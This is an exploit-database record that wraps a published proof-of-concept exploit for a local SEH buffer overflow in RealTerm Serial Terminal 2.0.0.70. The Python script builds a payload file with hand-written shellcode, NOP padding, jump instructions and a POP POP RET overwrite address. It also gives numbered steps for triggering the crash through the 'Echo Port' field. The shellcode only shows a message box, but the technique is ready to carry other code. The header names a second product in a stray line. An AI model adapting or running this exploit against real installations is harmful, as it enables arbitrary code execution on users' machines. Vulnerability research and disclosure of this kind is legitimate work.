Description
RealTerm Serial Terminal 2.0.0.70 - Echo Port Buffer Overflow (SEH)
{"lastseen": "2020-04-01T19:04:45", "references": [], "description": "\nRealTerm Serial Terminal 2.0.0.70 - Echo Port Buffer Overflow (SEH)", "edition": 1, "reporter": "Matteo Malvica", "exploitpack": {"type": "local", "platform": "windows"}, "published": "2019-02-21T00:00:00", "title": "RealTerm Serial Terminal 2.0.0.70 - Echo Port Buffer Overflow (SEH)", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2019-02-21T00:00:00", "id": "EXPLOITPACK:128D323E980CE6E8B60B30CF657BC0B3", "href": "", "viewCount": 6, "sourceData": "# Exploit Title: RealTerm: Serial Terminal 2.0.0.70 - 'Echo Port' Buffer Overflow - (SEH) \n# Date: 21.02.2019\n# Exploit Author: Matteo Malvica\n# Vendor Homepage: https://realterm.sourceforge.io/\n# Software Link: https://sourceforge.net/projects/realterm/files/ \n# Version: 2.0.0.70\n# Category: Local\n# Contact: https://twitter.com/matteomalvica\n# Version: CloudMe Sync 1.11.2\n# Tested on: Windows 7 SP1 x64\n# Originail PoC https://www.exploit-db.com/exploits/46391\n\n# 1.- Run the python script it will create a new file \"carbonara.txt\"\n# 2.- Copy the content of the new file 'carbonara.txt' to clipboard\n# 3.- Open realterm.exe \n# 4.- Go to 'Echo Port' tab\n# 5.- Paste clipboard in 'Port' field\n# 6.- Click on button -> Change\n# 7.- Check 'Echo On' or \n# 8.- Box!\n\n\nimport socket\nimport struct\n\n'''\nbadchars: 0x20,0x0a\narwin.exe user32.dll MessageBoxA\narwin - win32 address resolution program - by steve hanna - v.01\nMessageBoxA is located at 0x747cfdae in user32.dll\n'''\nshellcode = (\n\"\\x33\\xc0\" # XOR EAX,EAX\n\"\\x50\" # PUSH EAX => padding for lpCaption\n\"\\x68\\x7a\\x6f\\x21\\x21\" # PUSH \"zo!!\"\n\"\\x68\\x61\\x76\\x61\\x6e\" # PUSH \"avan\"\n\"\\x8B\\xCC\" # MOV ECX,ESP => PTR to lpCaption\n\"\\x50\" # PUSH EAX => padding for lpText\n\"\\x68\\x6e\\x7a\\x6f\\x21\" # PUSH \"nzo!\"\n\"\\x68\\x61\\x76\\x61\\x21\" # PUSH \"ava!\"\n\"\\x8B\\xD4\" # MOV EDX,ESP => PTR to lpText\n\"\\x50\" # PUSH EAX - uType=0x0\n\"\\x51\" # PUSH ECX - lpCaption\n\"\\x52\" # PUSH EDX - lpText\n\"\\x50\" # PUSH EAX - hWnd=0x0\n\"\\xBE\\xae\\xfd\\x7c\\x74\" # MOV ESI,USER32.MessageBoxA <<< hardcoded address\n\"\\xFF\\xD6\") # CALL ESI\n\npad1=\"\\x90\"*(142-len(shellcode))\npad2 = \"\\x42\" * 118\nnseh = \"\\xEB\\x80\\x90\\x90\"\njmp_back = \"\\xEB\\x80\\x90\\x90\"\nshort_jmp = \"\\xEB\\x12\\x90\\x90\"\nseh = struct.pack('<L',0x00406e27) # 00406e27# POP POP RET\nnops = \"\\x90\\x90\\x90\\x90\"\npayload = pad1 + shellcode + nops + jmp_back + pad2 + nseh + seh \n\n\ntry:\n f=open(\"carbonara.txt\",\"w\")\n print \"[+] Creating %s bytes pasta payload..\" %len(payload)\n f.write(payload)\n f.close()\n print \"[+] Carbonara created!\"\n\nexcept:\n print \"Carbonara cannot be created\"", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645843552, "score": 1659814272}, "_internal": {"score_hash": "4aa03b6664e33404fbf2b20d6ef4e570"}}
{}